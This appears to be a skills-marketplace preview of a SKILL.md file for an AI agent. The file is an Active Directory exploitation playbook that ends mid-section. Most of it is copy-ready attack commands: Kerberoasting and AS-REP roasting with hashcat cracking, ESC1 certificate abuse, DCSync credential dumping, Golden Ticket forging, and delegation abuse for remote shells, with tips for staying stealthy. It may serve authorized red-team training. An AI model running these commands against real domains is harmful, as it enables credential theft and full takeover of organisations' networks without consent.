Skip to main content

ad

Active Directory exploitation — BloodHound analysis, Kerberoasting, AS-REP Roasting, AD CS abuse, DCSync, Golden Ticket, Constrained Delegation.

소스 정보

저장소
BitterSecurity/Decepticon
최근 소스 활동
2026년 5월 26일 15:19
감지된 SKILL.md 언어
영어
스타
5,611
포크
1,061

설치 방법

기본적으로 소스를 먼저 확인하는 Prompt가 선택됩니다. 직접 명령으로 전환하거나 로컬 사본을 다운로드할 수도 있습니다.

소스 파일 검토

설치 여부를 결정하기 전에 SKILL.md와 SkillsMP에 표시된 보조 파일을 읽어 보세요.

파일 탐색기
2 개 파일

SKILL.md 표시 중

SKILL.md
소스 지침 · 읽기 전용 미리보기
name
ad
description
Active Directory exploitation — BloodHound analysis, Kerberoasting, AS-REP Roasting, AD CS abuse, DCSync, Golden Ticket, Constrained Delegation.
allowed-tools
Bash Read Write
metadata
{"subdomain":"credential-access","when_to_use":"kerberoast, AS-REP roast, DCSync, golden ticket, AD CS, bloodhound, constrained delegation, active directory exploit, certipy, rubeus","tags":"active-directory, kerberos, credential-access, privilege-escalation, lateral-movement","mitre_attack":"T1558.003, T1558.004, T1003.006, T1649, T1550.003, T1087.002"}
# Active Directory Exploitation Knowledge Base Active Directory exploitation targets authentication protocols, certificate services, and trust relationships to escalate privileges, extract credentials, and achieve domain dominance. All techniques require prior domain access (compromised user or machine account). ## Quick Reference — Common AD Attack Patterns ```bash # BloodHound collection (SharpHound from Windows) SharpHound.exe -c All --outputdirectory bloodhound/ # BloodHound collection (bloodhound-python from Linux) bloodhound-python -u '<USER>' -p '<PASS>' -d <TARGET> -ns <DC_IP> -c all --zip -o bloodhound/ # Kerberoast all SPNs impacket-GetUserSPNs '<DOMAIN>/<USER>:<PASS>' -dc-ip <DC_IP> -request -outputfile kerberoast_hashes.txt # AS-REP Roast impacket-GetNPUsers '<DOMAIN>/' -dc-ip <DC_IP> -usersfile users.txt -format hashcat -outputfile asrep_hashes.txt # DCSync — dump all hashes impacket-secretsdump '<DOMAIN>/<USER>:<PASS>'@<DC_IP> -outputfile dcsync_dump # AD CS enumeration certipy find -u '<USER>@<DOMAIN>' -p '<PASS>' -dc-ip <DC_IP> -stdout > adcs_enum.txt ``` ## MITRE ATT&CK Mapping | Technique ID | Name | Skill Section | |-------------|------|---------------| | T1558.003 | Kerberoasting | Section 2 | | T1558.004 | AS-REP Roasting | Section 3 | | T1003.006 | DCSync | Section 5 | | T1649 | Steal or Forge Authentication Certificates | Section 4 | | T1550.003 | Pass the Ticket | Section 6, 7 | | T1087.002 | Domain Account Discovery | Section 1 | ## 1. BloodHound / SharpHound — Attack Path Analysis ### Data Collection **SharpHound (Windows)** ```powershell # All collection methods — generates ZIP for BloodHound import SharpHound.exe -c All --outputdirectory C:\workspace\bloodhound\ # Stealth collection — sessions only (lower noise) SharpHound.exe -c Session --loop --loopduration 02:00:00 # Specific collection types SharpHound.exe -c DCOnly # DC queries only — no host enumeration SharpHound.exe -c Group,ACL,Trust # Targeted collection ``` **bloodhound-python (Linux)** ```bash # Full collection from Linux bloodhound-python -u '<USER>' -p '<PASS>' -d <TARGET> -ns <DC_IP> -c all --zip -o bloodhound/ # With NTLM hash (pass-the-hash) bloodhound-python -u '<USER>' --hashes ':<NT_HASH>' -d <TARGET> -ns <DC_IP> -c all --zip -o bloodhound/ ``` ### Key BloodHound Queries ```cypher # Find shortest path to Domain Admins MATCH p=shortestPath((n {owned:true})-[*1..]->(g:Group {name:"DOMAIN ADMINS@<TARGET>"})) RETURN p # Find Kerberoastable users with admin paths MATCH (u:User {hasspn:true})-[*1..5]->(g:Group {highvalue:true}) RETURN u.name, g.name # Find AS-REP Roastable users MATCH (u:User {dontreqpreauth:true}) RETURN u.name, u.description # Find users with DCSync rights MATCH p=(n)-[:GetChanges|GetChangesAll*1..]->(d:Domain) RETURN p # Find constrained delegation targets MATCH (c {allowedtodelegate: true}) RETURN c.name, c.allowedtodelegate ``` ## 2. Kerberoasting Targets service accounts with SPNs. Requests TGS tickets encrypted with the service account's password hash, then cracks offline. ### Enumeration & Extraction **Impacket (Linux)** ```bash # Request all kerberoastable TGS tickets impacket-GetUserSPNs '<DOMAIN>/<USER>:<PASS>' -dc-ip <DC_IP> -request -outputfile kerberoast_hashes.txt # With NTLM hash impacket-GetUserSPNs '<DOMAIN>/<USER>' -hashes ':<NT_HASH>' -dc-ip <DC_IP> -request -outputfile kerberoast_hashes.txt # Target a specific SPN impacket-GetUserSPNs '<DOMAIN>/<USER>:<PASS>' -dc-ip <DC_IP> -request-user '<SPN_USER>' -outputfile kerberoast_target.txt ``` **Rubeus (Windows)** ```powershell # Kerberoast all SPNs Rubeus.exe kerberoast /outfile:C:\workspace\kerberoast_hashes.txt # Target specific user Rubeus.exe kerberoast /user:<SPN_USER> /outfile:C:\workspace\kerberoast_target.txt # Use RC4 downgrade for easier cracking (noisier) Rubeus.exe kerberoast /rc4opsec /outfile:C:\workspace\kerberoast_rc4.txt # Use AES (stealthier, harder to crack) Rubeus.exe kerberoast /aes /outfile:C:\workspace\kerberoast_aes.txt ``` ### Offline Cracking ```bash # Hashcat — Kerberos 5 TGS-REP (mode 13100) hashcat -m 13100 kerberoast_hashes.txt /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule -o kerberoast_cracked.txt # With multiple wordlists hashcat -m 13100 kerberoast_hashes.txt /usr/share/wordlists/rockyou.txt /usr/share/wordlists/custom.txt -o kerberoast_cracked.txt # AES-encrypted TGS tickets (mode 19700) hashcat -m 19700 kerberoast_aes_hashes.txt /usr/share/wordlists/rockyou.txt -o kerberoast_aes_cracked.txt ``` ## 3. AS-REP Roasting Targets accounts with "Do not require Kerberos pre-authentication" enabled. No valid credentials required — only a username list. ### Enumeration & Extraction **Impacket (Linux)** ```bash # With a user list (no creds needed) impacket-GetNPUsers '<DOMAIN>/' -dc-ip <DC_IP> -usersfile users.txt -format hashcat -outputfile asrep_hashes.txt # With valid creds — enumerate and roast automatically impacket-GetNPUsers '<DOMAIN>/<USER>:<PASS>' -dc-ip <DC_IP> -request -format hashcat -outputfile asrep_hashes.txt ``` **Rubeus (Windows)** ```powershell # AS-REP Roast all vulnerable accounts Rubeus.exe asreproast /format:hashcat /outfile:C:\workspace\asrep_hashes.txt # Target specific user Rubeus.exe asreproast /user:<TARGET_USER> /format:hashcat /outfile:C:\workspace\asrep_target.txt ``` ### Offline Cracking ```bash # Hashcat — Kerberos 5 AS-REP (mode 18200) hashcat -m 18200 asrep_hashes.txt /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule -o asrep_cracked.txt ``` ## 4. AD CS Abuse — ESC1 (Certificate Template Exploitation) ESC1: Certificate template allows requesters to specify a Subject Alternative Name (SAN), enabling impersonation of any domain user including Domain Admins. ### Prerequisites - Enrollment rights on a vulnerable template - Template allows client authentication (EKU) - Template permits SAN specification (ENROLLEE_SUPPLIES_SUBJECT) ### Enumeration **Certipy (Linux)** ```bash # Enumerate all CA and template information certipy find -u '<USER>@<DOMAIN>' -p '<PASS>' -dc-ip <DC_IP> -stdout > adcs_enum.txt # Find vulnerable templates specifically certipy find -u '<USER>@<DOMAIN>' -p '<PASS>' -dc-ip <DC_IP> -vulnerable -stdout > adcs_vulnerable.txt ``` **Certify (Windows)** ```powershell # Enumerate CAs and templates Certify.exe cas Certify.exe find # Find vulnerable templates Certify.exe find /vulnerable ``` ### ESC1 Exploitation **Certipy (Linux)** ```bash # Request certificate with SAN of Domain Admin certipy req -u '<USER>@<DOMAIN>' -p '<PASS>' -dc-ip <DC_IP> -ca '<CA_NAME>' -template '<TEMPLATE_NAME>' -upn 'administrator@<DOMAIN>' -out admin_cert # Authenticate with the certificate (PKINIT) certipy auth -pfx admin_cert.pfx -dc-ip <DC_IP> -domain <TARGET> # Output: NT hash of the impersonated user — use for pass-the-hash ``` **Certify + Rubeus (Windows)** ```powershell # Request certificate with SAN Certify.exe request /ca:<CA_NAME> /template:<TEMPLATE_NAME> /altname:administrator # Convert PEM to PFX openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out admin.pfx # Authenticate with certificate via Rubeus (PKINIT) Rubeus.exe asktgt /user:administrator /certificate:C:\workspace\admin.pfx /ptt ``` ## 5. DCSync Attack Impersonates a Domain Controller to request password replication data. Requires DS-Replication-Get-Changes and DS-Replication-Get-Changes-All rights (typically Domain Admins, Enterprise Admins, or DC machine accounts). ### Check Replication Rights ```bash # BloodHound query MATCH p=(n)-[:GetChanges|GetChangesAll*1..]->(d:Domain) RETURN p # Impacket — check ACLs impacket-findDelegation '<DOMAIN>/<USER>:<PASS>' -dc-ip <DC_IP> ``` ### Execution **Impacket secretsdump.py (Linux)** ```bash # DCSync all accounts impacket-secretsdump '<DOMAIN>/<USER>:<PASS>'@<DC_IP> -outputfile dcsync_dump # DCSync specific user (stealthier) impacket-secretsdump '<DOMAIN>/<USER>:<PASS>'@<DC_IP> -just-dc-user administrator -outputfile dcsync_admin # With pass-the-hash impacket-secretsdump '<DOMAIN>/<USER>'@<DC_IP> -hashes ':<NT_HASH>' -just-dc -outputfile dcsync_dump ``` **Mimikatz (Windows)** ```powershell # DCSync all accounts mimikatz # lsadump::dcsync /domain:<TARGET> /all /csv # DCSync specific user mimikatz # lsadump::dcsync /domain:<TARGET> /user:administrator # DCSync krbtgt (for Golden Ticket creation) mimikatz # lsadump::dcsync /domain:<TARGET> /user:krbtgt ``` ### Output Format ``` # secretsdump output format: <DOMAIN>\<USER>:<RID>:<LM_HASH>:<NT_HASH>::: # Key accounts to extract: # - Administrator (RID 500) — domain admin access # - krbtgt — Golden Ticket creation # - Machine accounts — lateral movement via S4U ``` ## 6. Golden Ticket Creation Forges a TGT using the krbtgt account hash, granting unlimited access as any user for the lifetime of the ticket (default 10 years). Requires the krbtgt NTLM hash (obtained via DCSync). ### Prerequisites - krbtgt NTLM hash - Domain SID (`whoami /user` or `impacket-lookupsid`) - Domain FQDN ### Forge the Ticket **Mimikatz (Windows)** ```powershell # Create Golden Ticket and inject into memory mimikatz # kerberos::golden /user:administrator /domain:<TARGET> /sid:<DOMAIN_SID> /krbtgt:<KRBTGT_NT_HASH> /ptt # Create Golden Ticket and save to file mimikatz # kerberos::golden /user:administrator /domain:<TARGET> /sid:<DOMAIN_SID> /krbtgt:<KRBTGT_NT_HASH> /ticket:C:\workspace\golden.kirbi # With specific groups (Domain Admins=512, Enterprise Admins=519, Schema Admins=518) mimikatz # kerberos::golden /user:administrator /domain:<TARGET> /sid:<DOMAIN_SID> /krbtgt:<KRBTGT_NT_HASH> /groups:512,519,518 /ptt ``` **Impacket ticketer.py (Linux)** ```bash # Create Golden Ticket impacket-ticketer -nthash '<KRBTGT_NT_HASH>' -domain-sid '<DOMAIN_SID>' -domain '<TARGET>' administrator -outputfile golden # Use the ticket export KRB5CCNAME=golden.ccache impacket-psexec '<TARGET>/administrator@<DC_HOSTNAME>' -k -no-pass impacket-secretsdump '<TARGET>/administrator@<DC_HOSTNAME>' -k -no-pass impacket-wmiexec '<TARGET>/administrator@<DC_HOSTNAME>' -k -no-pass ``` ### Lookup Domain SID ```bash # From Linux impacket-lookupsid '<DOMAIN>/<USER>:<PASS>'@<DC_IP> 0 # From Windows whoami /user # Remove the last RID portion (-500, -1001, etc.) to get the domain SID ``` ## 7. Constrained Delegation Abuse Abuses S4U2self and S4U2proxy Kerberos extensions. A compromised account with constrained delegation can impersonate any user to the delegated service. ### Enumeration ```bash # Find accounts with constrained delegation (Impacket) impacket-findDelegation '<DOMAIN>/<USER>:<PASS>' -dc-ip <DC_IP> -target-domain <TARGET> # BloodHound query MATCH (c {allowedtodelegate: true}) RETURN c.name, c.allowedtodelegate ``` ```powershell # PowerShell Get-ADObject -Filter {msDS-AllowedToDelegateTo -ne "$null"} -Properties msDS-AllowedToDelegateTo ``` ### S4U2self / S4U2proxy Exploitation **Impacket getST.py (Linux)** ```bash # Request service ticket via S4U — impersonate administrator to target service impacket-getST '<DOMAIN>/<COMPROMISED_ACCOUNT>:<PASS>' -spn '<TARGET_SPN>' -impersonate administrator -dc-ip <DC_IP> -outputfile s4u_ticket # With NTLM hash impacket-getST '<DOMAIN>/<COMPROMISED_ACCOUNT>' -hashes ':<NT_HASH>' -spn '<TARGET_SPN>' -impersonate administrator -dc-ip <DC_IP> -outputfile s4u_ticket # Use the resulting ticket export KRB5CCNAME=s4u_ticket.ccache impacket-psexec '<TARGET>/administrator@<TARGET_HOST>' -k -no-pass impacket-smbexec '<TARGET>/administrator@<TARGET_HOST>' -k -no-pass ``` **Rubeus (Windows)** ```powershell # S4U full chain — request TGT, then S4U2self, then S4U2proxy
GitHub에서 보기
이 SKILL.md는 매우 커서 SkillsMP가 여기에는 첫 섹션만 미리 보여줍니다. GitHub에서 보기